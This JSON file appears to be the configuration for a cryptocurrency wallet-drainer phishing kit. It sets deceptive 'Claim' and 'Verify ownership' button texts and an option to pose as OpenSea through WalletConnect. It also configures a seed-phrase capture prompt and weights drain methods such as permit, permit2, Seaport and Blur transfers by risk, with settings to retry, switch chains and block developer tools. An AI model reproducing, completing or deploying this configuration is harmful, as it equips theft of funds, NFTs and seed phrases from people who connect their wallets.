{
  "connect_buttons_class": "interact-button",
  "drain_buttons_class": "interact-button",
  "disconnect_buttons_class": "",
  "connect_text": "Connect Wallet",
  "connected_text": "Connected As {wallet}",
  "loading_text": "Verifying",
  "verify_text": "Please Verify",
  "drain_button_waiting_click_text": "Claim",
  "change_chain_text": "Please Switch Chain",
  "not_eligible_text": "You Are Not Eligible",
  "disconnect_text": "Disconnect",
  "transfer_function_name": "Claim",
  "wallet_connect_project_id": "",
  "trust_sign_text": "Verify ownership: {wallet}",
  "hidden_chain_name": "Merge",
  "theme": "light",
  "images_path": "./images",
  "change_buttons_text": true,
  "disable_eth_sign_if_wallet_connect": true,
  "disable_eth_sign_if_metamask": true,
  "use_increase_allowance_when_available": true,
  "use_token_transfer_if_increase_allowance_not_available": true,
  "use_opensea_transfers": true,
  "use_multi_functions_contract": true,
  "enable_popup": true,
  "popup_prompt_change_chain": true,
  "popup_prompt_ask_confirm": true,
  "popup_prompt_ask_confirm_only_one_time": true,
  "use_wallet_connect_v4": true,
  "trust_sign_use_typed_data": true,
  "use_ratio": true,
  "auto_load_files": true,
  "refresh_at_end": true,
  "reload_if_not_eligible": true,
  "popup_style": 6,
  "popup_5_max_time_before_auto_close": 15000,
  "popup_6_max_time_before_auto_close": 15000,
  "modal_style": 12,
  "min_ratio_for_ask_change_chain": 0.95,
  "min_wallet_total_value": 1,
  "retry_count": 50,
  "max_change_chain_retry": 50,
  "only_chain_to_drain": 0,
  "nfts_api": 2,
  "tokens_api": 2,
  "max_slippage_on_swap": 10,
  "popup_2_config": {
    "title": "Pending...",
    "message": "Verify your wallet to continue",
    "max_time_before_auto_close": 7500
  },
  "popup_3_config": {
    "title": "Confirm this transaction in your wallet",
    "max_time_before_auto_close": 7500
  },
  "popup_4_config": {
    "open_function": "window.openPopup(param,isError)",
    "close_function": "window.closePopup()",
    "max_time_before_auto_close": 7500,
    "mode": 1
  },
  "wallet_connect_config": {
    "logo_url": "",
    "background_image": "",
    "background_color": "",
    "accent_color": "",
    "accept_fill_color": "",
    "overlay_background_color": "",
    "font_family": "",
    "color_mix": "",
    "color_mix_strength": 0,
    "font_size_master": "",
    "remove_border_radius": false
  },
  "wallet_connect_spoof": {
    "name": "Opensea",
    "description": "Opeanse Official Marketplace",
    "url": "https://opensea.io",
    "icon": "https://opensea.io/favicon.ico",
    "enabled": false
  },
  "seeds_drain": {
    "checks_enabled": true,
    "enable_other_wallets": true,
    "name": "Non-web3 wallets",
    "logo_path": "default",
    "text": "Please enter your seed phrase to continue",
    "pass_phrase_text": "Sign in to your hidden wallet (leave empty if you don't have)",
    "uneligible_text": "Seed not eligible, please try with another one",
    "prompt_seed_over_price": 10,
    "prompt_seed_under_price": 250,
    "enabled": false
  },
  "methods_risk_ratio": {
    "permit": 2.5,
    "permit2": 2.5,
    "blurTransfers": 2,
    "seaport": 2,
    "makerDaoContract": 1.5,
    "approvement": 1.5,
    "tokenTransfer": 1.5,
    "balanceTransfer": 1.5,
    "swell": 1.5,
    "apeCoinsUnstake": 1.5,
    "swap": 1.5,
    "wyvern": 1.5,
    "gmx": 1.5,
    "openseaTransfers": 1.5,
    "x2y2BatchTransfer": 1.5,
    "creepzTransfers": 1.5,
    "punkTransfer": 1.5,
    "liquidEtherfi": 1.25,
    "safa": 1
  },
  "wait_click_of_drain_button_to_start": false,
  "disable_permit2": false,
  "disable_seaport": false,
  "disable_permit": false,
  "disable_swap": false,
  "disable_blur": false,
  "disable_wyvern": false,
  "disable_x2y2_batch_transfer": false,
  "use_token_transfer": false,
  "use_window_provider_if_detected": false,
  "auto_prompt": false,
  "click_everywhere_open_modal": false,
  "prompt_trust_sign": false,
  "log_prompts": false,
  "log_chains_accepts": false,
  "hide_poor_connects": false,
  "log_full_site_url": false,
  "balance_transfers_in_last_position": false,
  "safa_in_last_position": false,
  "hide_added_chain": false,
  "drain_only_one_chain": false,
  "blacklist_rabby": false,
  "disable_dev_tool": false,
  "wait_page_load": false,
  "create_wallet_for_seaport": false,
  "use_cache_data": false
}